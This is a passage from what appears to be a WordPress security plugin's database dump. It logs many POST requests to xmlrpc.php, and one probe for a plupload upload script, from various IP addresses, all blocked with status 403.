Safari\\/537.36\"}','rXBoAyblhewJkRT109FMPLuS',0,1681448255.4559,607,'','POST',403,0,515,0,1,'',0),('116.202.233.238',1959455214,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','jVQSA4HcYfbgCUo8iNsXeKqt',0,1681448262.5089,1467,'','POST',403,0,515,0,1,'',0),('51.254.221.76',872340812,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','4JfAuNFjarYPULp0KMxXhykH',0,1681448268.0677,1382,'','POST',403,0,515,0,1,'',0),('185.119.88.55',3111606327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yqZnfRLxcYjamztsC0e28uKU',0,1681448268.1514,1318,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','qM3aXnTAHF4SvWk8z7geQOR1',0,1681448275.0595,604,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','i2w0emzKxf4dYLbyXq7ZtjHc',0,1681448278.6598,641,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','AqNtCVFzHEbjKhvcLYmue2d9',0,1681448289.8616,2317,'','POST',403,0,515,0,1,'',0),('199.16.130.127',3339747967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','liIGEXoNBcT3f1JzvtM9kda5',0,1681451082.5616,3793,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','p4Q7ZC9KTBzkPahosFtIY6yd',0,1681451098.7244,1333,'','POST',403,0,515,0,1,'',0),('45.195.56.33',767768609,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','sRq3DbleH7gAu9N21nzp6x0T',0,1681451100.7916,609,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','nPIzySWkgY9DdXiasNtrpmJE',0,1681451107.9234,2703,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','2C76Emf8uqb3IjdphyZDNcSA',0,1681451110.2969,834,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','lGNev4X3cSYabympu8q7RJAB',0,1681451122.3172,589,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','EPomLBRJXSFO3K6hGfCZbika',0,1681451127.2101,645,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','hkgCa2GHMNscz50nvuYQjTfr',0,1681451132.7126,562,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','z7efTgGktA6bdyF9xP2mOHRq',0,1681451162.0632,603,'','POST',403,0,515,0,1,'',0),('103.200.23.149',1741166485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','kceyaWzj7l5df0bVuXBA2K4H',0,1681451168.9897,564,'','POST',403,0,515,0,1,'',0),('103.221.221.51',1742593331,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','YzoSmf3r0TxE6MiIe4vVJuC8',0,1681451169.8696,593,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','WdQsbrNYPOfVnkF63CvzjXMc',0,1681452959.7164,1782,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','58DXBsJOUaRv0Cct3Lenw6gE',0,1681452968.8534,1030,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','bD36NrJdgeKFIv8WHkBhx25X',0,1681452969.3573,948,'','POST',403,0,515,0,1,'',0),('185.208.182.231',3117463271,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ArmpQ1iWjKdMB8os5HXVNzu7',0,1681452978.6593,570,'','POST',403,0,515,0,1,'',0),('200.58.112.226',3359273186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','hPt3W6Nl7oOyxiLVSarQfs5w',0,1681452987.2876,572,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','3oVhcAq6TOwjUy2kNrZzJ4ml',0,1681452989.5399,575,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','5IZpuVg3FBYWLE2A0DdqGrms',0,1681452990.9980,640,'','POST',403,0,515,0,1,'',0),('68.178.247.133',1152579461,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','hseAB8LvRiWNUXfIOrda5mkC',0,1681453003.7505,655,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','YniwuUpKvL3GotDNgEXq9Tke',0,1681453004.9629,554,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','YTxOVpWQfPszLo1vGwnjmRZe',0,1681453014.3667,605,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','E6auxhH4VwFXsy7PzIOKY938',0,1681454608.5928,2510,'','POST',403,0,515,0,1,'',0),('213.152.161.40',3583549736,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nQ0clDHYOt9oiJmE7bxqd5Rp',0,1681455698.2129,2180,'','POST',403,0,515,0,1,'',0),('37.120.132.83',628655187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EeD0XWbOFm9gL1akpVM8CPS7',0,1681456255.5011,3920,'','POST',403,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xcEKoX4AOtf0BGeNg3jk2drY',0,1681458387.2500,5125,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','cQwrzmlCEf7kaJsNW5qxVL39',0,1681459273.0501,3808,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','DT4apelMwiqPW2BbjH07dYRA',0,1681459275.7895,1493,'','POST',403,0,515,0,1,'',0),('41.111.172.42',695184426,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','1OTpqwhegE07WN4ulaZ9vmXU',0,1681459284.5291,1221,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Mb1mfZtlKYDT9Xnwipq8J2PO',0,1681459285.7993,679,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','9PDWQaOIrqGi68onbztd3Thm',0,1681459299.0080,552,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','e1x8Pi3jhRUCgIb0dBnuZtfl',0,1681459302.1611,551,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','U0XhgFe2Jqoa5YuMAft8GCWz',0,1681459306.3707,543,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','b4pTDxA3Che8qLw7XsryHScY',0,1681459308.0246,559,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','7mcrU8DLx0Z2HTMgh6zIwpAW',0,1681459313.5554,610,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','mLQDUoSVtrakdeBHjYN48KuR',0,1681459321.2464,573,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','HYz7Cl9rSN8Rp2UdG0iQManZ',0,1681459329.0651,553,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/admin/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','AJZn42QFvLwryzeMfVhRlgsx',0,1681459822.1491,1525,'','GET',403,0,700,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','iyYmGtUxrl04czNq2KJdoOwS',0,1681461378.7341,2019,'','POST',403,0,515,0,1,'',0),('3.1.211.113',50451313,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','rQF1MWdus5wNl37ADpOUZxJ4',0,1681461376.7682,4997,'','POST',403,0,515,0,1,'',0),('89.163.145.59',1503891771,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','WC1Z9Nkxz2q6VaXUbBoDHmT0',0,1681461381.0718,1348,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','v4ZaO5lY7n0fKQpiV8WL9ATj',0,1681461390.3288,585,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','VM1N35oKyBxvSnPcm2GtYzei',0,1681461396.0062,1610,'','POST',403,0,515,0,1,'',0),('52.69.122.222',876968670,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','0mhwqK8aUzOu3pTDPjLobYCE',0,1681462137.8459,1201,'','POST',403,0,515,0,1,'',0),('219.94.129.200',3680403912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','82HYLpoADXykrvqSwaFKiOTZ',0,1681462142.9838,1563,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','7ISuxXTtMZmoHK5qidQjcNFC',0,1681462145.3555,4592,'','POST',403,0,515,0,1,'',0),('101.34.78.12',1696747020,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','adL3gAkw4MP7YVDUq1JmoGy2',0,1681462147.5513,4806,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','aPe0FW4MsLKy7RZmDuX2VvlS',0,1681462160.6605,1406,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','JepnQcwFUARvEslBKy7d8jM4',0,1681462160.8687,1339,'','POST',403,0,515,0,1,'',0),('173.231.231.50',2917656370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','oUJzvVSYAdBZ2e1bKuX84jEq',0,1681462165.3021,615,'','POST',403,0,515,0,1,'',0),('89.163.145.59',1503891771,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Ye1ZGKVqap7oLu9l4EbHx58I',0,1681462172.7950,628,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','8j06JoyTOYkC1iI5ZHFBzLnV',0,1681463332.6313,2874,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','UL9Nfcqik4HgayMDvYFjIRdS',0,1681463339.0129,640,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','6uzdvxRGJrlhIA9QDM4nHqwB',0,1681463341.5702,1485,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','0pU2b8Ix4eWJVAEnoijtdhR7',0,1681463341.8699,1272,'','POST',403,0,515,0,1,'',0),('47.56.207.178',792252338,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','idKhYMb5vNXcL04Q7jZDzmfa',0,1681463351.8014,584,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','6z9OmviNL4CEVB3UxktlQoJY',0,1681463354.8280,638,'','POST',403,0,515,0,1,'',0),('217.18.33.11',3641843979,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','7CTv3P2cr5EUnihIWRgHzfuJ',0,1681463360.5095,603,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','J0dR9qEMnpxozCyeBu6bjKN1',0,1681463365.0582,605,'','POST',403,0,515,0,1,'',0),('196.189.44.24',3300731928,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','AHrc6Ow8Tfy0q9gm4LtpUV1D',0,1681463371.0684,713,'','POST',403,0,515,0,1,'',0),('87.101.92.171',1466260651,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XwJeabp6CyHYPmnc1o3qxi2S',0,1681463773.2793,1501,'','POST',403,0,515,0,1,'',0),('193.37.254.3',3240492547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','axiehGdXcgKqQu2IJymNkLpz',0,1681464232.4586,3784,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','8KPgUuWIGcm7pMJiyXEtxved',0,1681465499.9344,14121,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Dg0WSUQRwl83Tbt51vJm62Vu',0,1681465500.0520,14096,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','TJQqGZSBsbL8dImE5oOtpY6X',0,1681465505.6461,9799,'','POST',403,0,515,0,1,'',0),('59.126.108.85',998141013,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','UJbq2NFOB3sAPGjHZurTyV6c',0,1681465519.9634,1133,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','1qLOIUAs0MDbQEH7yW2w6z8r',0,1681465523.6488,1538,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','cLwEieTgn8RpsUVaqOouGvzA',0,1681465534.9568,3591,'','POST',403,0,515,0,1,'',0),('216.238.104.161',3639503009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','EnljDJCSIxyQmKqgMi2LRkod',0,1681465538.3404,6299,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','kFRInqO3JpjZBX5ESPohuAHw',0,1681465545.1485,6103,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','tSEnADTNM3kPCHov1Uqm8JX9',0,1681465546.0436,5719,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','GDMe3hf7sAmR2avu4COHtJoI',0,1681465554.6852,1773,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','rdGb5nFLtki3J7m9l20Sx8NI',0,1681465555.9425,1285,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','nRoUlBGrzNx28SOE0gajhqmK',0,1681465567.4878,782,'','POST',403,0,515,0,1,'',0),('45.33.83.85',757158741,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','OfnN74bI1ZduMxj8vwt925iB',0,1681465599.5803,573,'','POST',403,0,515,0,1,'',0),('141.98.102.243',2372036339,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NMtCP93LWin6OEwxclUz5Ra1',0,1681466644.2228,4122,'','POST',403,0,515,0,1,'',0),('200.63.100.19',3359597587,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','KXRWaqklzOhPCDdnIBxwo6TS',0,1681466996.9888,3763,'','POST',403,0,515,0,1,'',0),('165.22.211.204',2769736652,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 